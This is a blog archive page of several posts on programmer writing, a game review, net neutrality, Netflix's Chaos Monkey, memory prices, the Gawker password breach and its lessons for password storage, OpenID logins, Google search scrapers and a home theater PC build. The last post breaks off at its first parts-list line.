How to Write Without Writing
I have a confession to make: in a way, I founded Stack Overflow to trick my fellow programmers.
Before you trot out the pitchforks and torches, let me explain.
Over the last 6 years, I’ve come to believe deeply in the idea that that becoming a great programmer has very little to do with programming. Yes, it takes a modicum of technical skill and dogged persistence, absolutely. But even more than that, it takes serious communication skills:
The difference between a tolerable programmer and a great programmer is not how many programming languages they know, and it’s not whether they prefer Python or Java. It’s whether they can communicate their ideas. By persuading other people, they get leverage. By writing clear comments and technical specs, they let other programmers understand their code, which means other programmers can use and work with their code instead of rewriting it. Absent this, their code is worthless.
That is of course a quote from my co-founder Joel Spolsky, and it’s one of my favorites.
In defense of my fellow programmers, communication with other human beings is not exactly what we signed up for. We didn’t launch our careers in software development because we loved chatting with folks. Communication is just plain hard, particularly written communication. How exactly do you get better at something you self-selected out of? Blogging is one way:
People spend their entire lives learning how to write effectively. It isn’t something you can fake. It isn’t something you can buy. You have to work at it.That’s exactly why people who are afraid they can’t write should be blogging.
It’s exercise. No matter how out of shape you are, if you exercise a few times a week, you’re bound to get fitter. Write a small blog entry a few times every week and you’re bound to become a better writer. If you’re not writing because you’re intimidated by writing, well, you’re likely to stay that way forever.
Even with the best of intentions, telling someone “you should blog!” never works. I know this from painful first hand experience. Blogging isn’t for everyone. Even a small blog entry can seem like an insurmountable, impenetrable, arbitrary chunk of writing to the average programmer. How do I get my fellow programmers to blog without blogging, to write without writing?
By cheating like hell, that’s how.
Consider this letter I received:
I’m not sure if you have thought about this side effect or not, but Stack Overflow has taught me more about writing effectively than any class I’ve taken, book I’ve read, or any other experience I have had before.I can think of no other medium where I can test my writing chops (by writing an answer), get immediate feedback on its quality (particularly when writing quality trumps technical correctness, such as subjective questions) and see other peoples attempts as well and how they compare with mine. Votes don’t lie and it gives me a good indicator of how well an email I might send out to future co-workers would be received or a business proposal I might write.
Over the course of the past 5 months all the answers I’ve been writing have been more and more refined in terms of the quality. If I don’t end up as the top answer I look at the answer that did and study what they did differently and where I faltered. Was I too verbose or was I too terse? Was I missing the crux of the question or did I hit it dead on?
I know that you said that writing your Coding Horror blog helped you greatly in refining your writing over the years. Stack Overflow has been doing the same for me and I just wanted to thank you for the opportunity. I’ve decided to setup a coding blog in your footsteps and I just registered a domain today. Hopefully that will go as well as writing on SO has. There are no tougher critics than fellow programmers who scrutinize every detail, every technical remark and grammar structure looking for mistakes. If you can effectively write for and be accepted by a group of programmers you can write for anyone.
Joel and I have always positioned Stack Overflow, and all the other Stack Exchange Q&A sites, as lightweight, focused, “fun size” units of writing.
Yes, by God, we will trick you into becoming a better writer if that’s what it takes – and it always does. Stack Overflow has many overtly gamelike elements, but it is a game in service of the greater good – to make the internet better, and more importantly, to make you better. Seeing my fellow programmers naturally improve their written communication skills while participating in a focused, expert Q&A community with their peers? Nothing makes me prouder.
Beyond programming, there’s a whole other community of peers out there who grok how important writing is, and will support you in sharpening your saw, er, pen. We have our own, too.
If you’re an author, editor, reviewer, blogger, copywriter, or aspiring writer of any kind, professional or otherwise – check out writers.stackexchange.com. Becoming a more effective writer is the one bedrock skill that will further your professional career, no matter what you choose to do.
But mostly, you should write. I thought Jon Skeet summed it up particularly well here:
Everyone should write a lot – whether it’s a blog, a book, Stack Overflow answers, emails or whatever. Write, and take some care over it. Clarifying your communication helps you to clarify your own internal thought processes, in my experience. It’s amazing how much you find you don’t know when you try to explain something in detail to someone else. It can start a whole new process of discovery.
The process of writing is indeed a journey of discovery, one that will last the rest of your life. It doesn’t ultimately matter whether you’re writing a novel, a printer review, a Stack Overflow answer, fan fiction, a blog entry, a comment, a technical whitepaper, some emo LiveJournal entry, or even meta-talk about writing itself. Just get out there and write!
| [advertisement] JIRA Studio - SVN hosting, issue tracking, CI and Google Apps integration. Free trial » |
More: continued here
Popularity: unranked [?]
Sphere: Related ContentMy Holiday in Beautiful Panau
There is a high correlation between “programmer” and “gamer”. One of the first Area 51 sites we launched, based on community demand, was gaming.stackexchange.com. Despite my fundamental skepticism about gaming as a Q&A topic — as expressed on episode 87 of Herding Code — I have to admit it has far exceeded my expectations.
But then maybe I shouldn’t be so surprised. I’ve talked about the relationship between gamer and programmer before:
- Programming Games, Analyzing Games
- Everything I Needed to Know About Programming I Learned from BASIC
- Game Player, Game Programmer
I used to recommend games on this very blog that I particularly enjoyed and felt were worthy of everyone’s attention. I don’t do this a lot any more, now that my blogging schedule has slipped to one post a week, if I’m lucky. (If you’re wondering why, it’s because running your own business is crazy stupid amounts of work when you turn it up to eleven.) Here are a few games I’ve recommended in the past:
- Guitar Hero: Are You Ready to Rock?
- Darwinia
- DEFCON: Shall We Play a Game?
- Company of Heroes
- Living the Dream: Rock Band
- Feeding my Graphics Card Addiction (Fallout 3)
- My Software is Being Pirated (World of Goo)
I haven’t had a ton of time to play games, other than the inevitable Rock Band 3, but I’ve been consumed by another game I had no idea would become so addictive — Just Cause 2.
It’s what you might call an open world sandbox game, in the vein of the Grand Theft Autos. But I could never get into the GTA games, even after trying GTA 3 and its sequels Vice City and San Andreas. They just left me cold, somehow.
Where GTA and its ilk often felt a tad too much like work for my tastes, Just Cause 2 is almost the opposite — it is non-stop, full blown open world pandemonium from start to finish. One of the game’s explicit goals is that you advance the plot by blowing stuff up. No, seriously. I’m not kidding. You have an entire 1000+ square kilometer island paradise at your disposal, filled with cities and military bases, spanning the range from snowy mountains to deserts to idyllic beaches — all just waiting for you to turn them into “chaos points” … by any means necessary.
Of course, you get around by hijacking whatever vehicles happen by, be they boats, airplanes, jumbo jets, cars, tanks, trucks, buses, monster trucks, motorcycles, scooters, tractors or anything in between. Even on foot it is fun to navigate the island of Panau, because the developers gave us an impossibly powerful personal zipline that you can fire at any object in the game to propel yourself toward it. Combine that with the magical parachute you can deploy anywhere, anytime, and they make for some fascinating diversions (parasailing anyone?). You can also use the zipline to attach any two objects together. Think about that for a second. Have you ever wondered what happens when you zipline a moving vehicle to a tree? Or a pedestrian? Or another vehicle? Hmm. As a result, simply going walkabout on the island is more fun than I ever would have imagined.
Between the 49 plot missions, 9 stronghold takeovers, 104 unique vehicles, the optional boat/plane/car/parachute race missions,the opportunities for insane stunt points, the umpteen zillion upgrade crates and faction objects to collect, and the 360+ locations in the 1000+ square kilometers of Panau — there’s always something interesting happening around every corner. And whatever it is, it’s probably beautiful and blows up real good.
In short, Just Cause 2 is deliriously, stupidly, absurdly entertaining. I can’t even remember the last game I completed where I felt compelled to go back after finishing the main storyline to discover even more areas I missed during my initial playthrough and get (most of) the in-game achievements. Whatever amount of time you have to play, Just Cause 2 will happily fill it with totally unscripted, awesome open world pandemonium.
Don’t take my word for it; even the notoriously acidic game reviewer Yahtzee had almost nothing negative to say about Just Cause 2, which is his version of a positive review. And Metacritic gives Just Cause 2 a solid 84. Not that it can’t be improved, of course; after such a sublime sandbox experience, I’m desperately curious to see what they’ll add for Just Cause 3.
Luckily for you, the game has been out long enough that it can be picked up for a song on PS3, Xbox, or PC. Steam has Just Cause 2 on sale right now in an 8 player pack for $60, and Amazon has all versions in stock for under $30. Beware, though, as the PC version does require a pretty solid video card along with Windows Vista or newer — but the upside is that I have mine cranked up to 2048×1152 with almost all the options on, and it rarely dips below 60 fps.
I spent my holidays on the beautiful island of Panau, and I don’t regret a second of it. If you’re looking for a vacation spot, I heartily recommend the open world sandbox of Panau. But while you’re visiting, do be mindful of any errant gunfire, vehicles, and explosions.
| [advertisement] JIRA Studio - SVN hosting, issue tracking, CI and Google Apps integration. Free trial » |
More: continued here
Popularity: unranked [?]
Sphere: Related ContentThe Importance of Net Neutrality
Although I remain a huge admirer of Lawrence Lessig, I am ashamed to admit that I never fully understood the importance of net neutrality until last week. Mr. Lessig described network neutrality in these urgent terms in 2006:
At the center of the debate is the most important public policy you’ve probably never heard of: “network neutrality.” Net neutrality means simply that all like Internet content must be treated alike and move at the same speed over the network. The owners of the Internet’s wires cannot discriminate. This is the simple but brilliant “end-to-end” design of the Internet that has made it such a powerful force for economic and social good: All of the intelligence and control is held by producers and users, not the networks that connect them.
Fortunately, the good guys are winning. Recent legal challenges to network neutrality have been defeated, at least under US law. I remember hearing about these legal decisions at the time, but I glossed over them because I thought they were fundamentally about file sharing and BitTorrent. Not to sound dismissive, but someone’s legal right to download a complete video archive of Firefly wasn’t exactly keeping me up at night.
But network neutrality is about far more than file sharing bandwidth. To understand what’s at stake, study the sordid history of the world’s communication networks – starting with the telegraph, radio, telephone, television, and onward. Without historical context, it’s impossible to appreciate how scarily easy it is for common carriage to get subverted and undermined by corporations and government in subtle (and sometimes not so subtle) ways, with terrible long-term consequences for society.
That’s the genius of Tim Wu’s book The Master Switch: The Rise and Fall of Information Empires.
One of the most fascinating stories in the book is that of Harry Tuttle and AT&T.
Harry Tuttle was, for most of his life, president of the Hush-a-Phone Corporation, manufacturer of the telephone silencer. Apart from Tuttle, Hush-a-Phone employed his secretary. The two of them worked alone out of a small office near Union Square in New York City. Hush-a-Phone’s signature product was shaped like a scoop, and it fit around the speaking end of a receiver, so that no one could hear what the user was saying on the telephone. The company motto emblazoned on its letterhead stated the promise succinctly: “Makes your phone private as a booth.”If the Hush-a-Phone never became a household necessity, Tuttle did a decent business, and by 1950 he would claim to have sold 125,000 units. But one day late in the 1940s, Henry Tuttle received alarming news. AT&T had launched a crackdown on the Hush-a-Phone and similar products, like the Jordaphone, a creaky precursor of the modern speakerphone, whose manufacturer had likewise been put on notice. Bell repairmen began warning customers that Hush-a-Phone use was a violation of a federal tariff and that, failing to cease and desist, they risked termination of their telephone service.
Was AT&T merely blowing smoke? Not at all: the company was referring to a special rule that was part of their covenant with the federal government. It stated: No equipment, apparatus, circuit or device not furnished by the telephone company shall be attached to or connected with the facilities furnished by the telephone company, whether physically, by induction, or otherwise.
Tuttle hired an attorney, who petitioned the FCC for a modification of the rule and an injunction against AT&T’s threats. In 1950 the FCC decided to hold a trial (officially a “public hearing”) in Washington, D.C., to consider whether AT&T, the nation’s regulated monopolist, could punish its customers for placing a plastic cup over their telephone mouthpiece.
The story of the Hush-a-Phone and its struggle with AT&T, for all its absurdist undertones, offers a window on the mindset of the monopoly at its height, as well as a picture of the challenges facing even the least innovative innovator at that moment.
Absurdist, indeed – Harry Tuttle is also not-so-coincidentally the name of a character in the movie Brazil, one who attempts to work as a renegade, outside oppressive centralized government systems. Often at great peril to his own life and, well, that of anyone who happens to be nearby, too.
But the story of Harry Tuttle isn’t just a cautionary tale about the dangers of large communication monopolies. Guess who was on Harry Tuttle’s side in his sadly doomed legal effort against the enormously powerful Bell monopoly? No less than an acoustics professor by the name of Leo Beranek, and an expert witness by the name of J.C.R. Licklider.
If you don’t recognize those names, you should. J.C.R. Licklider went on to propose and design ARPANET, and Leo Beranek became one of the B’s in Bolt, Beranek and Newman, who helped build ARPANET. In other words, these gentlemen went on from battling the Bell monopoly in court in the 1950s to designing a system in 1968 that would ultimately defeat it: the internet.
The internet is radically unlike all the telecommunications networks that have preceded it. It’s the first national and global communication network designed from the outset to resist mechanisms for centralized control and monopoly. But resistance is not necessarily enough; The Master Switch makes a compelling case that, historically speaking, all communication networks start out open and then rapidly swing closed as they are increasingly commercialized.
Just as our addiction to the benefits of the internal combustion engine led us to such demand for fossil fuels as we could no longer support, so, too, has our dependence on our mobile smart phones, touchpads, laptops, and other devices delivered us to a moment when our demand for bandwidth – the new black gold – is insatiable. Let us, then, not fail to protect ourselves from the will of those who might seek domination of those resources we cannot do without. If we do not take this moment to secure our sovereignty over the choices that our information age has allowed us to enjoy, we cannot reasonably blame its loss on those who are free to enrich themselves by taking it from us in a manner history has foretold.
It’s up to us to be vigilant in protecting the concepts of common carriage and network neutrality on the internet. Even devices that you may love, like an iPad, Kindle, or Xbox, can easily be turned against you – if you let them.
| [advertisement] JIRA Studio - SVN hosting, issue tracking, CI and Google Apps integration. Free trial » |
More: continued here
Popularity: unranked [?]
Sphere: Related ContentWorking with the Chaos Monkey
Late last year, the Netflix Tech Blog wrote about five lessons they learned moving to Amazon Web Services. AWS is, of course, the preeminent provider of so-called “cloud computing”, so this can essentially be read as key advice for any website considering a move to the cloud. And it’s great advice, too. Here’s the one bit that struck me as most essential:
We’ve sometimes referred to the Netflix software architecture in AWS as our Rambo Architecture. Each system has to be able to succeed, no matter what, even all on its own. We’re designing each distributed system to expect and tolerate failure from other systems on which it depends.
If our recommendations system is down, we degrade the quality of our responses to our customers, but we still respond. We’ll show popular titles instead of personalized picks. If our search system is intolerably slow, streaming should still work perfectly fine.
One of the first systems our engineers built in AWS is called the Chaos Monkey. The Chaos Monkey’s job is to randomly kill instances and services within our architecture. If we aren’t constantly testing our ability to succeed despite failure, then it isn’t likely to work when it matters most – in the event of an unexpected outage.
Which, let’s face it, seems like insane advice at first glance. I’m not sure many companies even understand why this would be a good idea, much less have the guts to attempt it. Raise your hand if where you work, someone deployed a daemon or service that randomly kills servers and processes in your server farm.
Now raise your other hand if that person is still employed by your company.
Who in their right mind would willingly choose to work with a Chaos Monkey?
Sometimes you don’t get a choice; the Chaos Monkey chooses you. At Stack Exchange, we struggled for months with a bizarre problem. Every few days, one of the servers in the Oregon web farm would simply stop responding to all external network requests. No reason, no rationale, and no recovery except for a slow, excruciating shutdown sequence requiring the server to bluescreen before it would reboot.
We spent months — literally months — chasing this problem down. We walked the list of everything we could think of to solve it, and then some:
- swapping network ports
- replacing network cables
- a different switch
- multiple versions of the network driver
- tweaking OS and driver level network settings
- simplifying our network configuration and removing TProxy for more traditional
X-FORWARDED-FOR - switching virtualization providers
- changing our TCP/IP host model
- getting Kernel hotfixes and applying them
- involving high-level vendor support teams
- some other stuff that I’ve now forgotten because I blacked out from the pain
At one point in this saga our team almost came to blows because we were so frustrated. (Well, as close to “blows” as a remote team can get over Skype, but you know what I mean.) Can you blame us? Every few days, one of our servers — no telling which one — would randomly wink off the network. The Chaos Monkey strikes again!
Even in our time of greatest frustration, I realized that there was a positive side to all this:
- Where we had one server performing an essential function, we switched to two.
- If we didn’t have a sensible fallback for something, we created one.
- We removed dependencies all over the place, paring down to the absolute minimum we required to run.
- We implemented workarounds to stay running at all times, even when services we previously considered essential were suddenly no longer available.
Every week that went by, we made our system a tiny bit more redundant, because we had to. Despite the ongoing pain, it became clear that Chaos Monkey was actually doing us a big favor by forcing us to become extremely resilient. Not tomorrow, not someday, not at some indeterminate “we’ll get to it eventually” point in the future, but right now where it hurts.
Now, none of this is new news; our problem is long since solved, and the Netflix Tech Blog article I’m referring to was posted last year. I’ve been meaning to write about it, but I’ve been a little busy. Maybe the timing is prophetic; AWS had a huge multi-day outage last week, which took several major websites down, along with a constellation of smaller sites.
Notably absent from that list of affected AWS sites? Netflix.
When you work with the Chaos Monkey, you quickly learn that everything happens for a reason. Except for those things which happen completely randomly. And that’s why, even though it sounds crazy, the best way to avoid failure is to fail constantly.
More: continued here
Popularity: unranked [?]
Sphere: Related Content24 Gigabytes of Memory Ought to be Enough for Anybody
Are you familiar with this quote?
640K [of computer memory] ought to be enough for anybody. — Bill Gates
It’s amusing, but Bill Gates never actually said that:
I’ve said some stupid things and some wrong things, but not that. No one involved in computers would ever say that a certain amount of memory is enough for all time … I keep bumping into that silly quotation attributed to me that says 640K of memory is enough. There’s never a citation; the quotation just floats like a rumor, repeated again and again.
One of the few killer features of the otherwise unexciting Intel Core i7 platform upgrade* is the subtle fact that Core i7 chips use triple channel memory. That means three memory slots at a minimum, and in practice most Core i7 motherboards have six memory slots.
The price of DDR3 ram has declined to the point that populating all six slots of memory with 4 GB memory is, well, not cheap — but quite attainable at $299 and declining.
Twenty-four gigabytes of system memory for a mere $299! That’s about $12.50 per gigabyte.
(And if you don’t have a Core i7 system, they’re not expensive to build, either. You can pair an inexpensive motherboard with even the slowest and cheapest triple channel compatible i7-950, which is plenty speedy – and overclocks well, if you’re into that. Throw in the 24 GB of ram, and it all adds up to about $800 total. Don’t forget the power supply and CPU cooler, though.)
Remember when one gigabyte of system memory was considered a lot? For context, our first “real” Stack Overflow database server had 24 GB of memory. Now I have that much in my desktop … just because I can. Well, that’s not entirely true, as we do work with some sizable databases while building the Stack Exchange network.
I guess having 24 gigabytes of system memory is a little extravagant, but at these prices — why not? What’s the harm in having obscene amounts of memory, making my system effectively future proof?
I have to say that in 1981, making those decisions, I felt like I was providing enough freedom for 10 years. That is, a move from 64k to 640k felt like something that would last a great deal of time. Well, it didn’t – it took about only 6 years before people started to see that as a real problem. — Bill Gates
To me, it’s more about no longer needing to think about memory as a scarce resource, something you allocate carefully and manage with great care. There’s just .. lots. As Clay Shirky once related to me, via one of his college computer science professors:
Algorithms are for people who don’t know how to buy RAM.
I mean, 24 GB of memory should be enough for anybody… right?
* it’s only blah on the desktop; on the server the Nehalem architecture is indeed a monster and anyone running a server should upgrade to it, stat.
| [advertisement] JIRA Studio - SVN hosting, issue tracking, CI and Google Apps integration. Free trial » |
More: continued here
Popularity: unranked [?]
Sphere: Related ContentThe Dirty Truth About Web Passwords
This weekend, the Gawker network was compromised.
This weekend we discovered that Gawker Media’s servers were compromised, resulting in a security breach at Lifehacker, Gizmodo, Gawker, Jezebel, io9, Jalopnik, Kotaku, Deadspin, and Fleshbot. If you’re a commenter on any of our sites, you probably have several questions.
It’s no Black Sunday or iPod modem firmware hack, but it has release notes — and the story it tells is as epic as Beowulf:
So, here we are again with a monster release of ownage and data droppage. Previous attacks against the target were mocked, so we came along and raised the bar a little. How’s this for “script kids”? Your empire has been compromised, your servers, your databases, online accounts and source code have all been ripped to shreds!
You wanted attention, well guess what, You’ve got it now!
Read those release notes. It’ll explain how the compromise unfolded, blow by blow, from the inside.
Gawker is operated by Nick Denton, notorious for the unapologetic and often unethical “publish whatever it takes to get traffic” methods endorsed on his network. Do you remember the iPhone 4 leak? That was Gawker. Do you remember the article about bloggers being treated as virtual sweatshop workers? That was Gawker. Do you remember hearing about a blog lawsuit? That was probably Gawker, too.
Some might say having every account on your network compromised is exactly the kind of unwanted publicity attention that Gawker was founded on.
Personally, I’m more interested in how we can learn from this hack. Where did Gawker go wrong, and how can we avoid making those mistakes on our projects?
- Gawker saved passwords. You should never, ever store user passwords. If you do, you’re storing passwords incorrectly. Always store the salted hash of the password — never the password itself! It’s so easy, even members of Mensa er .. can’t .. figure it out.
- Gawker used encryption incorrectly. The odd choice of archaic DES encryption meant that the passwords they saved were all truncated to 8 characters. No matter how long your password actually was, you only had to enter the first 8 characters for it to work. So much for choosing a secure pass phrase. Encryption is only as effective as the person using it. I’m not smart enough to use encryption, either, as you can see in Why Isn’t My Encryption.. Encrypting?
- Gawker asked users to create a username and password on their site. The FAQ they posted about the breach has two interesting clarifications:
2) What if I logged in using Facebook Connect? Was my password compromised?
No. We never stored passwords of users who logged in using Facebook Connect.
3) What if I linked my Twitter account with my Gawker Media account? Was my Twitter password compromised?
No. We never stored Twitter passwords from users who linked their Twitter accounts with their Gawker Media account.That’s right, people who used their internet driver’s license to authenticate on these sites had no security problems at all! Does the need to post a comment on Gizmodo really justify polluting the world with yet another username and password? It’s only the poor users who decided to entrust Gawker with a unique username and ’secure’ password who got compromised.
(Beyond that, “don’t be a jerk” is good advice to follow in business as well as your personal life. I find that you generally get back what you give. When your corporate mission is to succeed by exploiting every quasi-legal trick in the book, surely you can’t be surprised when you get the same treatment in return.)
But honestly, as much as we can point and laugh at Gawker and blame them for this debacle, there is absolutely nothing unique or surprising about any of this. Regular readers of my blog are probably bored out of their minds by now because I just trotted out a whole bunch of blog posts I wrote 3 years ago. Again.
Here’s the dirty truth about website passwords: the internet is full of websites exactly like the Gawker network. Let’s say you have good old traditional username and passwords on 50 different websites. That’s 50 different programmers who all have different ideas of how your password should be stored. I hope for your sake you used a different (and extremely secure) password on every single one of those websites. Because statistically speaking, you’re screwed.
In other words, the more web sites you visit, the more networks you touch and trust with a username and password combination — the greater the odds that at least one of those networks will be compromised exactly like Gawker was, and give up your credentials for the world to see. At that point, unless you picked a strong, unique password on every single site you’ve ever visited, the situation gets ugly.
The bad news is that most users don’t pick strong passwords. This has been proven time and time again, and the Gawker data is no different. Even worse, most users re-use these bad passwords across multiple websites. That’s how this ugly Twitter worm suddenly appeared on the back of a bunch of compromised Gawker accounts.
Now do you understand why I’ve been so aggressive about promoting the concept of the internet driver’s license? That is, logging on to a web site using a set of third party credentials from a company you can actually trust to not be utterly incompetent at security? Sure, we’re centralizing risk here to, say, Google, or Facebook — but I trust Google a heck of a lot more than I trust J. Random Website, and this really is no different in practice than having password recovery emails sent to your GMail account.
I’m not here to criticize Gawker. On the contrary, I’d like to thank them for illustrating in broad, bold relief the dirty truth about website passwords: we’re all better off without them. If you’d like to see a future web free of Gawker style password compromises — stop trusting every random internet site with a unique username and password! Demand that they allow you to use your internet driver’s license — that is, your existing Twitter, Facebook, Google, or OpenID credentials — to log into their website.
| [advertisement] JIRA Studio - SVN hosting, issue tracking, CI and Google Apps integration. Free trial » |
More: continued here
Popularity: unranked [?]
Sphere: Related ContentYour Internet Driver’s License
Back in summer 2008 when we were building Stack Overflow, I chose OpenID logins for reasons documented in Does The World Really Need Yet Another Username and Password:
I realize that OpenID is far from an ideal solution. But right now, the one-login-per-website problem is so bad that I am willing to accept these tradeoffs for a partial worse is better solution. There’s absolutely no way I’d put my banking credentials behind an OpenID. But there are also dozens of sites that I don’t need anything remotely approaching banking-grade security for, and I use these sites far more often than my bank. The collective pain of remembering all these logins — and the way my email inbox becomes a de-facto collecting point and security gateway for all of them — is substantial.
It always pained me greatly that every rinky-dink website on the entire internet demanded that I create a special username and password just for them. Yes, if you’re an alpha geek, then you probably use a combination of special software and USB key from your utility belt to generate secure usernames and passwords for the dozens of websites you frequent. But for the vast, silent majority of normals, who know nothing of security but desire convenience above all, this means one thing: using the same username and password over and over. And it’s probably a simple password, too.
This is the status quo of identity on the internet. It is deeply and fundamentally broken.
But it doesn’t have to be this way. If you open your wallet (or purse, or man-purse, or whatever), I bet you’ll find a variety of credentials you use to prove your identity wherever you go.
The average wallet contains a few different forms of identity with varying strengths:
- Strong: California driver’s license, student ID
- Moderate: credit cards, health insurance card, video rental membership, gym card
- Weak: Albertson’s Preferred Card, Best Buy Rewards Zone Card, Coffee loyalty card
(and sometimes even, uh, cards for free lapdances, apparently)
In the real world, we don’t regularly hold two dozen forms of identity like we expect people to on the web. Not only would you be carrying around the freaking Constanza wallet at that point, it would be insane. In the real world, we somehow manage to get by with about two or three strong forms of identity, complemented by a few other weaker forms to taste.
I’m proposing that our web wallets begin to mimic our physical wallets. Whenever a website needs to know who I am, they should ask to see my Internet Driver’s License.
Now, I don’t literally mean a driver’s license. I’m using this term figuratively to mean online credentials that I can re-use in more than one place on the internet. If all I want to do is leave a comment on a blog — like, say, this one — then one of the weaker forms of identity will surely do. If I’m starting a new bank account, or setting up a profile on a dating website, then maybe a stronger credential from my virtual wallet is necessary.
The core concept that users need to get used to is logging in to a website by showing a third party credential to validate their identity. This idea isn’t nearly as crazy as it seemed in 2008. How many websites can you log into by showing your Facebook, Google, or Twitter credentials now? Lots!
The whole online identity situation may seem as impossible as peace in the Middle East at this point. But when faced with a problem that appears intractable, is your solution to throw your hands up, mindlessly embrace the status quo, and wearily sigh “whaddaya gonna do?”
Some people do that. It’s their right. Personally, I prefer to be the change I want to see. So for us, on Stack Overflow and the Stack Exchange network, that means aggressively promoting the concept of the Internet Driver’s License. Including educating users as necessary.
For example, consider this ATM machine. To use it, do I need to sign up for an account at Shanghai Peking Development Bank? No. I can use any form of trusted third-party credentials the machine supports.
Similarly, to log into any Stack Exchange site, including Stack Overflow, present any OpenID or OAuth 2.0 compliant identity provider as your Internet Driver’s License.
When we founded Stack Overflow, we set out with the explicit mission to make the internet better. Adding yet another meaningless username and password to the fabric of the web does not make it better. What does make the internet better is continued pursuit of better, simpler, re-usable forms of third party online identity. That’s why I urge you to join me in supporting OpenID, OAuth 2.0, and any other promising implementations of the Internet Driver’s License.
| [advertisement] JIRA Studio - SVN hosting, issue tracking, CI and Google Apps integration. Free trial » |
More: continued here
Popularity: unranked [?]
Sphere: Related ContentTrouble In the House of Google
Let’s look at where stackoverflow.com traffic came from for the year of 2010.
When 88.2% of all traffic for your website comes from a single source, criticizing that single source feels … risky. And perhaps a bit churlish, like looking a gift horse in the mouth, or saying something derogatory in public about your Valued Business Partnertm.
Still, looking at the statistics, it’s hard to avoid the obvious conclusion. I’ve been told many times that Google isn’t a monopoly, but they apparently play one on the internet. You are perfectly free to switch to whichever non-viable alternative web search engine you want at any time. Just breathe in that sweet freedom, folks.
Sarcasm aside, I greatly admire Google. My goal is not to be acquired, because I’m in this thing for the long haul – but if I had to pick a company to be acquired by, it would probably be Google. I feel their emphasis on the information graph over the social graph aligns more closely with our mission than almost any other potential suitor I can think of. Anyway, we’ve been perfectly happy with Google as our de-facto traffic sugar daddy since the beginning. But last year, something strange happened: the content syndicators began to regularly outrank us in Google for our own content.
Syndicating our content is not a problem. In fact, it’s encouraged. It would be deeply unfair of us to assert ownership over the content so generously contributed to our sites and create an underclass of digital sharecroppers. Anything posted to Stack Overflow, or any Stack Exchange Network site for that matter, is licensed back to the community in perpetuity under Creative Commons cc-by-sa. The community owns their contributions. We want the whole world to teach each other and learn from the questions and answers posted on our sites. Remix, reuse, share – and teach your peers! That’s our mission. That’s why I get up in the morning.
However, implicit in this strategy was the assumption that we, as the canonical source for the original questions and answers, would always rank first. Consider Wikipedia – when was the last time you clicked through to a page that was nothing more than a legally copied, properly attributed Wikipedia entry encrusted in advertisements? Never, right? But it is in theory a completely valid, albeit dumb, business model. That’s why Joel Spolsky and I were confident in sharing content back to the community with almost no reservations – because Google mercilessly penalizes sites that attempt to game the system by unfairly profiting on copied content. Remixing and reusing is fine, but mass-producing cheap copies encrusted with ads … isn’t.
I think of this as common sense, but it’s also spelled out explicitly in Google’s webmaster content guidelines.
However, some webmasters attempt to improve their page’s ranking and attract visitors by creating pages with many words but little or no authentic content. Google will take action against domains that try to rank more highly by just showing scraped or other auto-generated pages that don’t add any value to users. Examples include:Scraped content. Some webmasters make use of content taken from other, more reputable sites on the assumption that increasing the volume of web pages with random, irrelevant content is a good long-term strategy. Purely scraped content, even from high-quality sources, may not provide any added value to your users without additional useful services or content provided by your site. It’s worthwhile to take the time to create original content that sets your site apart. This will keep your visitors coming back and will provide useful search results.
In 2010, our mailboxes suddenly started overflowing with complaints from users – complaints that they were doing perfectly reasonable Google searches, and ending up on scraper sites that mirrored Stack Overflow content with added advertisements. Even worse, in some cases, the original Stack Overflow question was nowhere to be found in the search results! That’s particularly odd because our attribution terms require linking directly back to us, the canonical source for the question, without nofollow. Google, in indexing the scraped page, cannot avoid seeing that the scraped page links back to the canonical source. This culminated in, of all things, a special browser plug-in that redirects to Stack Overflow from the ripoff sites. How totally depressing. Joel and I thought this was impossible. And I felt like I had personally failed all of you.
The idea that there could be something wrong with Google was inconceivable to me. Google is gravity on the web, an omnipresent constant; blaming Google would be like blaming gravity for my own clumsiness. It wasn’t even an option. I started with the golden rule: it’s always my fault. We did a ton of due diligence on webmasters.stackexchange.com to ensure we weren’t doing anything overtly stupid, and uber-mensch Matt Cutts went out of his way to investigate the hand-vetted search examples contributed in response to my tweet asking for search terms where the scrapers dominated. Issues were found on both sides, and changes were made. Success!
Despite the semi-positive resolution, I was disturbed. If these dime-store scrapers were doing so well and generating so much traffic on the back of our content – how was the rest of the web faring? My enduring faith in the gravitational constant of Google had been shaken. Shaken to the very core.
Throughout my investigation I had nagging doubts that we were seeing serious cracks in the algorithmic search foundations of the house that Google built. But I was afraid to write an article about it for fear I’d be claimed an incompetent kook. I wasn’t comfortable sharing that opinion widely, because we might be doing something obviously wrong. Which we tend to do frequently and often. Gravity can’t be wrong. We’re just clumsy … right?
I can’t help noticing that we’re not the only site to have serious problems with Google search results in the last few months. In fact, the drum beat of deteriorating Google search quality has been practically deafening of late:
- Why We Desperately Need a New (and Better) Google
- Dishwashers, and How Google Eats Its Own Tail
- Content Farms: Why Media, Blogs & Google Should Be Worried
- On the increasing uselessness of Google
- Google, Google, Why Hast Thou Forsaken the Manolo?
Anecdotally, my personal search results have also been noticeably worse lately. As part of Christmas shopping for my wife, I searched for “iPhone 4 case” in Google. I had to give up completely on the first two pages of search results as utterly useless, and searched Amazon instead.
People whose opinions I respect have all been echoing the same sentiment — Google, the once essential tool, is somehow losing its edge. The spammers, scrapers, and SEO’ed-to-the-hilt content farms are winning.
Like any sane person, I’m rooting for Google in this battle, and I’d love nothing more than for Google to tweak a few algorithmic knobs and make this entire blog entry moot. Still, this is the first time since 2000 that I can recall Google search quality ever declining, and it has inspired some rather heretical thoughts in me — are we seeing the first signs that algorithmic search has failed as a strategy? Is the next generation of search destined to be less algorithmic and more social?
It’s a scary thing to even entertain, but maybe gravity really is broken.
| [advertisement] JIRA Studio - SVN hosting, issue tracking, CI and Google Apps integration. Free trial » |
More: continued here
Popularity: unranked [?]
Sphere: Related ContentRevisiting the Home Theater PC
It’s been almost three years since I built my home theater PC. I adore that little machine; it drives all of our family entertainment and serves as a general purpose home media server and streaming box. As I get older, I find that I’m no longer interested in having a home full of PCs whirring away. I only want one PC in my house on all the time, and I want it to be as efficient and versatile as possible.
My old low-power Athlon X2 based HTPC generally worked great, but still struggled with some occasional 1080p content. And when you have a toddler in the house, believe me, you need reliable 1080p playback. Only the finest in children’s entertainment for my spawned process, I say!
When I recently had to transcode Megamind down to 720p to get it to play back without stuttering or pausing at times… I knew my current HTPC’s days were numbered.
(Megamind is hilarious and highly recommended, by the way; it’s far better than its Metacritic and Rotten Tomatoes percentages would seem to indicate.)
Now that Intel has finally released their Sandy Bridge CPUs — the first with integrated GPUs — I was eager to revisit and rebuild. The low power Core i3-2100T is the one I had my eye on, with a miserly TDP of 35 watts. Combine that with a decent Mini-ITX motherboard and a few other essential parts, and you’re good to go:
| CPU | Intel Core i3-2100T | $135 |
